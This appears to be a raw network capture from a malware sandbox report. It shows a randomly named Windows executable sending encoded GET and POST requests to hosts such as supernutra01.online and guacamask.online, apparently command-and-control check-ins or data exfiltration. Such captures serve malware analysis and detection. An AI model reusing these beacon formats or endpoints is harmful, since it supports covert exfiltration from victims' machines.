                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.749957208.91.197.27805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:55:10.568321943 CET531OUTGET /rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.guacamask.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:55:12.428277016 CET1236INHTTP/1.1 200 OK
                              Date: Mon, 02 Dec 2024 14:55:11 GMT
                              Server: Apache
                              Referrer-Policy: no-referrer-when-downgrade
                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                              Set-Cookie: vsid=902vr480696911733713151; expires=Sat, 01-Dec-2029 14:55:11 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XCGSFDhjoG0vWsR0MDEmI5gTJysiLu9+TwY/Oj0If0Q97r2L5SY8zJQHZCFYhqXJ9HzyJjYgYbNggQ0eQnd1tQ==
                              Transfer-Encoding: chunked
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              Data Raw: 31 39 63 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74
                              Data Ascii: 19c6b<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
                              Dec 2, 2024 15:55:12.428318977 CET109INData Raw: 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e
                              Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprApp
                              Dec 2, 2024 15:55:12.428421021 CET1236INData Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c
                              Data Ascii: liesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host"
                              Dec 2, 2024 15:55:12.428471088 CET1236INData Raw: 22 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66
                              Data Ascii: "){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,
                              Dec 2, 2024 15:55:12.428482056 CET1236INData Raw: 6f 55 70 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74
                              Data Ascii: oUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,999
                              Dec 2, 2024 15:55:12.428654909 CET1236INData Raw: 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e
                              Data Ascii: pe="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")
                              Dec 2, 2024 15:55:12.428668022 CET1236INData Raw: 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77
                              Data Ascii: ndow&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-
                              Dec 2, 2024 15:55:12.428678989 CET1236INData Raw: 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d
                              Data Ascii: if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usu
                              Dec 2, 2024 15:55:12.428690910 CET1236INData Raw: 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3b 74 72 79 7b 76 61 72 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61 29 3a
                              Data Ascii: handler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpRe
                              Dec 2, 2024 15:55:12.428719997 CET1236INData Raw: 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f
                              Data Ascii: peof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(type
                              Dec 2, 2024 15:55:12.548871040 CET1236INData Raw: 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 61 63 61 6d 61 73 6b 2e 6f 6e 6c 69 6e 65 2f
                              Data Ascii: js?ch=1"></script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.749977104.21.24.198805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:55:18.578898907 CET815OUTPOST /jt56/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.supernutra01.online
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.supernutra01.online
                              Referer: http://www.supernutra01.online/jt56/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 65 72 73 6d 63 75 69 68 76 68 34 56 79 4c 63 49 75 33 49 78 6e 6c 71 58 46 32 33 44 65 47 4a 7a 79 45 30 42 6d 37 46 38 53 79 67 39 2b 6a 6b 48 38 55 6e 75 37 30 70 38 49 4d 70 6e 71 58 43 6f 6b 7a 74 4e 4b 6c 4e 57 77 39 56 6e 53 34 77 56 2b 36 4d 55 37 2b 38 68 4d 6f 42 49 65 2b 7a 78 6c 47 41 44 4c 34 64 51 5a 6b 69 2f 2f 56 7a 4f 71 4d 32 79 38 32 70 6d 4e 55 51 38 50 53 54 44 7a 33 42 39 69 69 67 42 45 4f 31 2b 6f 2f 7a 76 34 63 6b 6c 62 2f 67 35 58 59 6a 38 33 33 6b 43 33 45 78 6b 41 51 78 77 77 51 35 54 2b 54 4f 68 65 42 6f 37 62 47 48 36 7a 77 37 45 39 57 56 62 53 54 35 69 41 3d 3d
                              Data Ascii: cNeT5P=6NqjI+vykHx13ersmcuihvh4VyLcIu3IxnlqXF23DeGJzyE0Bm7F8Syg9+jkH8Unu70p8IMpnqXCokztNKlNWw9VnS4wV+6MU7+8hMoBIe+zxlGADL4dQZki//VzOqM2y82pmNUQ8PSTDz3B9iigBEO1+o/zv4cklb/g5XYj833kC3ExkAQxwwQ5T+TOheBo7bGH6zw7E9WVbST5iA==
                              Dec 2, 2024 15:55:19.954665899 CET1236INHTTP/1.1 405 Not Allowed
                              Date: Mon, 02 Dec 2024 14:55:19 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQfmTPM0FPwTAY6udyOtTjbarkbiKdKCho%2Ffq8gDoLtT7T9OYOCh6jWlwdS%2BrYL99aweMXJq6Kl4ZLG9n1cM8Dm4baYk%2FeWtKuEDgAtcyIw5YRFLO6BgwpdRll0uAIrFRYVO%2BfqMRMmBrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc2843481642f1-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2744&min_rtt=2744&rtt_var=1372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to d
                              Dec 2, 2024 15:55:19.954734087 CET117INData Raw: 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64
                              Data Ascii: isable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                              Dec 2, 2024 15:55:19.956495047 CET5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.749983104.21.24.198805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:55:21.244126081 CET835OUTPOST /jt56/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.supernutra01.online
                              Connection: close
                              Content-Length: 239
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.supernutra01.online
                              Referer: http://www.supernutra01.online/jt56/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 37 37 73 67 2f 47 69 67 50 68 37 61 53 4c 63 47 4f 33 4d 78 6e 70 71 58 45 43 6e 44 73 69 4a 71 51 63 30 43 6e 37 46 73 43 79 67 70 75 6a 6c 44 38 56 6c 75 37 35 65 38 4a 77 70 6e 75 48 43 6f 6d 37 74 4e 39 4a 4f 58 67 39 54 7a 69 34 32 57 4f 36 4d 55 37 2b 38 68 4d 4e 63 49 65 6d 7a 79 56 57 41 44 75 59 65 4d 4a 6b 68 6f 50 56 7a 4b 71 4d 79 79 38 32 58 6d 4d 34 70 38 4d 71 54 44 79 48 42 39 77 4b 6a 49 45 4f 2f 7a 49 2b 65 2f 36 52 79 68 5a 2b 66 2f 46 73 38 77 6e 6e 56 4f 68 46 54 2b 69 63 64 75 68 6f 43 58 38 33 34 32 34 63 64 35 61 43 66 33 52 45 61 62 4b 7a 2f 57 41 79 39 30 34 52 33 2f 34 49 6d 2f 77 67 42 50 68 6c 4e 45 76 56 54 64 73 6f 3d
                              Data Ascii: cNeT5P=6NqjI+vykHx1377sg/GigPh7aSLcGO3MxnpqXECnDsiJqQc0Cn7FsCygpujlD8Vlu75e8JwpnuHCom7tN9JOXg9Tzi42WO6MU7+8hMNcIemzyVWADuYeMJkhoPVzKqMyy82XmM4p8MqTDyHB9wKjIEO/zI+e/6RyhZ+f/Fs8wnnVOhFT+icduhoCX83424cd5aCf3REabKz/WAy904R3/4Im/wgBPhlNEvVTdso=
                              Dec 2, 2024 15:55:22.669255018 CET1236INHTTP/1.1 405 Not Allowed
                              Date: Mon, 02 Dec 2024 14:55:22 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FOGBb1SrQngdHtuDtoVS2nVJ3YRakLm4INzvQuRaVAv%2BNDPfETm6%2FxB6wPZbPyu9gi5UOCq6uoVrgVQt%2BnZCJBUzxoY0qlyrz3unzCG8cWZ%2BeHcBv5b9tgdANKcFun0PsXfWPVqwOgGCXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc28540d979e08-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=12252&min_rtt=12252&rtt_var=6126&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                              Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding
                              Dec 2, 2024 15:55:22.669270992 CET126INData Raw: 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45
                              Data Ascii: to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.749988104.21.24.198805312C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              TimestampBytes transferredDirectionData
                              Dec 2, 2024 15:55:23.903778076 CET1848OUTPOST /jt56/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.supernutra01.online
                              Connection: close
                              Content-Length: 1251
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.supernutra01.online
                              Referer: http://www.supernutra01.online/jt56/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 37 37 73 67 2f 47 69 67 50 68 37 61 53 4c 63 47 4f 33 4d 78 6e 70 71 58 45 43 6e 44 73 71 4a 71 46 41 30 41 45 6a 46 76 43 79 67 32 65 6a 6f 44 38 56 6b 75 37 68 53 38 4a 38 66 6e 6f 62 43 70 44 76 74 42 5a 64 4f 65 67 39 54 78 69 34 7a 56 2b 36 5a 55 37 75 34 68 4d 39 63 49 65 6d 7a 79 54 53 41 46 37 34 65 63 35 6b 69 2f 2f 55 6e 4f 71 4d 61 79 38 4f 59 6d 4d 4d 6d 39 38 4b 54 61 53 58 42 34 46 57 6a 4b 6b 4f 78 39 6f 2b 47 2f 36 63 73 68 5a 7a 73 2f 42 73 43 77 68 58 56 4c 48 30 66 71 67 49 42 2f 6a 4a 5a 55 36 2f 48 2f 6f 59 4b 2b 5a 71 77 35 54 51 62 66 70 33 6e 54 53 43 64 33 75 5a 31 75 36 45 56 36 43 67 61 50 57 73 53 51 4d 39 72 47 36 78 41 75 32 38 69 69 42 41 34 50 33 51 35 71 64 4b 47 47 38 2b 6e 2f 58 71 58 67 56 79 2b 39 37 69 56 7a 6f 36 67 6f 49 4b 50 73 6b 73 52 76 79 62 73 5a 34 2f 49 7a 57 2f 46 49 63 6a 4f 4e 47 64 7a 50 44 44 6e 46 4c 6a 75 56 51 6b 48 6b 65 5a 70 54 31 6b 66 32 6d 72 35 49 45 54 36 47 77 78 2f 6a 41 66 [TRUNCATED]
                              Data Ascii: cNeT5P=6NqjI+vykHx1377sg/GigPh7aSLcGO3MxnpqXECnDsqJqFA0AEjFvCyg2ejoD8Vku7hS8J8fnobCpDvtBZdOeg9Txi4zV+6ZU7u4hM9cIemzyTSAF74ec5ki//UnOqMay8OYmMMm98KTaSXB4FWjKkOx9o+G/6cshZzs/BsCwhXVLH0fqgIB/jJZU6/H/oYK+Zqw5TQbfp3nTSCd3uZ1u6EV6CgaPWsSQM9rG6xAu28iiBA4P3Q5qdKGG8+n/XqXgVy+97iVzo6goIKPsksRvybsZ4/IzW/FIcjONGdzPDDnFLjuVQkHkeZpT1kf2mr5IET6Gwx/jAfODy1ZHuvWpW/4SVaLVWhsorbcjPJXcLKdrz5jcpd1vuzEiVJk6yDqISJpD51zl5gfRwmrKdqvby64vKT2V9Ja1lySsXESyQuOevZxDTrECFwQ/dXPtDVc+BO718k7PdmlNGWRuG2UpyEbvRRmmyZPGWSjg9YpRLuPb+YsZwEnNOAwUFHEhpuTP1bdzEiO4+z8gBZEnpJtSPoWfAO5FhHKE/TiMaEQfrGO3frXCjvZ4KYYgndCe7ywFLz7B/pomi2JWnj9J9O0PrBBmTS6UALoiGBKdCJtRhtmj6/C+1UZ3A1K19ecSVH+ajVbt2z2mXhRI58iE6Nxl6YTQHJngK/qFQ7p4Chf7EKlMjdehKeSaoBu2YjMzdfb46K5Becqy0mlEX2pkrsjjvaYIhxlWjg577nncicJxCJaaLVMFXSA0m9NNrwFoOwq1nTxso9Rv/TjUscELNEy1M8ZzpxwVZTPuNssiLmRXykxtsXkhA1cQp2zwWHWsar5clwpf8iVc7Zjtgn+YzieSByEAXs2O/P8KNi6EBLw/Cl87UBjw7dk6nUHu/ldA/+MjVzYspcwSINSaz/LEQLcu7+yKXi7GfHb7ACuSwcDwQw9vs9Rd5q5d7oWbK4vTHeAkgHhg/4CksTH6VOMjA96sCk/o1x3/k0Tiwgum48FhtOWK [TRUNCATED]
                              Dec 2, 2024 15:55:25.314714909 CET1236INHTTP/1.1 405 Not Allowed
                              Date: Mon, 02 Dec 2024 14:55:25 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W3dvmEDPp0Fbhg3IvM4RamTjIZeU4anjslNBIU75xEwc6qa%2FQX9CpmWxOgyfFcjt0UMx8doFzSheUVJbJpXrHF7KYw%2FfKLPDhysGu2HeteAZBTWCNrhNVDFbKrRmy%2FVe27OHuQ%2Brr8tyTg%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc2864ac1718fa-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1918&rtt_var=959&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1848&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
